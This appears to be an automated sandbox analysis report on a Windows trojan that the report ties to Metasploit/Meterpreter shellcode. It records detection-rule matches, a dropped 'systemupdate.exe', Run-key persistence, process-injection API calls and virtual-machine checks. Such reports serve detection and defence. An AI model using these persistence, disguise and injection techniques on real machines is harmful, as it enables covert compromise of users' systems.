Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload

Source: classification engine

Classification label: mal92.troj.evad.winEXE@13/8@1/2

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A419E60 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,		9_2_000001DE4A419E60
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A411F34 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,GetLastError,CreateEventW,GetCurrentProcess,DuplicateHandle,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,free,GetLastError,free,CloseHandle,CloseHandle,		9_2_000001DE4A411F34

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Code function: 0_2_00007FF75F8C0D00 GetFileType,GetFileSizeEx,SetFilePointer,SetEndOfFile,_lseeki64,GetFileInformationByHandle,calloc,calloc,FindFirstVolumeW,GetVolumeInformationW,FindNextVolumeW,FindNextVolumeW,GetVolumeInformationW,FindVolumeClose,free,GetDiskFreeSpaceExW,free,FindVolumeClose,free,_errno,GetLastError,_errno,_errno,

0_2_00007FF75F8C0D00

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

File created: C:\Users\user\AppData\Roaming\SystemCache

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1264:120:WilError_03

Source: sNifdpWiY9.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

File read: C:\Users\user\Desktop\sNifdpWiY9.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\google.bin
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process created: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\google.bin	Jump to behavior

Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: sNifdpWiY9.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: sNifdpWiY9.exe

Static file information: File size 3188321 > 1048576

Source: sNifdpWiY9.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Code function: 0_2_00007FF75F8CAC10 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

0_2_00007FF75F8CAC10

Source: sNifdpWiY9.exe	Static PE information: section name: .xdata
Source: sNifdpWiY9.exe	Static PE information: section name: /4
Source: sNifdpWiY9.exe	Static PE information: section name: /19
Source: sNifdpWiY9.exe	Static PE information: section name: /31
Source: sNifdpWiY9.exe	Static PE information: section name: /45
Source: sNifdpWiY9.exe	Static PE information: section name: /57
Source: sNifdpWiY9.exe	Static PE information: section name: /70
Source: sNifdpWiY9.exe	Static PE information: section name: /81
Source: sNifdpWiY9.exe	Static PE information: section name: /97
Source: sNifdpWiY9.exe	Static PE information: section name: /113
Source: antietat[1].exe.0.dr	Static PE information: section name: .xdata
Source: systemupdate.exe.0.dr	Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3FE832 push rsp; ret		9_2_000001DE4A3FE839
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3F6558 push rsp; ret		9_2_000001DE4A3F6559

Source: C:\Users\user\Desktop\sNifdpWiY9.exe	File created: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe			Jump to dropped file
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\antietat[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdate			Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUpdate			Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A4269F8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_000001DE4A4269F8

Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\sNifdpWiY9.exe	API coverage: 3.2 %
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	API coverage: 6.8 %
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	API coverage: 1.8 %
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	API coverage: 2.6 %
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	API coverage: 1.8 %
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	API coverage: 2.6 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: sNifdpWiY9.exe, 0000000C.00000002.1381605105.0000020AE3936000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E2349000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp$
Source: sNifdpWiY9.exe, 00000000.00000003.1296880059.00000202F4367000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000000.00000002.1298113649.00000202F4367000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23FC000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FCE000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5F49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: sNifdpWiY9.exe, 00000000.00000003.1296880059.00000202F4367000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000000.00000002.1298113649.00000202F4367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWV.r@
Source: sNifdpWiY9.exe, 00000000.00000002.1297883211.00000202F42F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: systemupdate.exe, 00000009.00000002.2494505334.000001DE4A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

